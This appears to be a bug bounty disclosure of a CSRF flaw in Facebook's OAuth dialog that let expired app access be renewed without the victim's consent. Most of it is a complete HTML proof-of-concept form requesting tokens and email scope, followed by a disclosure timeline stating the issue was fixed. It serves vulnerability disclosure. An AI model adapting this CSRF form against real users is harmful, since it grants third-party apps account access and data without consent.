[Facebook] CSRF to renew access to Apps
It was possible for an attacker to renew access to Apps which have expired for the victim without the victim's consent.
CSRF POC -
<html><body><script>history.pushState('', '', '/')</script><form action="https://www.facebook.com/v2.3/dialog/oauth"><input type="hidden" name="app_id" value="XXX" /><input type="hidden" name="auth_type" value="" /><input type="hidden" name="cbt" value="1622970398155" /><input type="hidden" name="channel_url" value="https://staticxx.facebook.com/x/connect/xd_arbiter/?version=46#cb=f11c70b8d77d13&domain=www.jiosaavn.com&origin=https%3A%2F%2Fwww.jiosaavn.com%2Ff1e7baa12b0f5a4&relation=opener" /><input type="hidden" name="client_id" value="XXX" /><input type="hidden" name="display" value="popup" /><input type="hidden" name="domain" value="www.XXX.com" /><input type="hidden" name="e2e" value="{}" /><input type="hidden" name="fallback_redirect_uri" value="https://www.XXX.com/signup?redirect=/" /><input type="hidden" name="fx_app" value="facebook" /><input type="hidden" name="locale" value="en_US" /><input type="hidden" name="logger_id" value="f256cfb96281ce4" /><input type="hidden" name="origin" value="1" /><input type="hidden" name="redirect_uri" value="https://staticxx.facebook.com/x/connect/xd_arbiter/?version=46#cb=f232d7fd018cdac&domain=www.jiosaavn.com&origin=https%3A%2F%2Fwww.XXX.com%2Ff1e7baa12b0f5a4&relation=opener&frame=f3505dbd2db68" /><input type="hidden" name="response_type" value="token,signed_request,graph_domain" /><input type="hidden" name="return_scopes" value="false" /><input type="hidden" name="scope" value="public_profile,email" /><input type="hidden" name="sdk" value="joey" /><input type="hidden" name="version" value="v2.3" /><input type="submit" value="Submit request" /></form></body></html>
Timeline -
Reported - Sunday, June 6, 2021Triaged - Friday, June 18, 2021Rewarded - Thursday, September 9, 2021 [with bonus]Fixed - Tuesday, November 30, 2021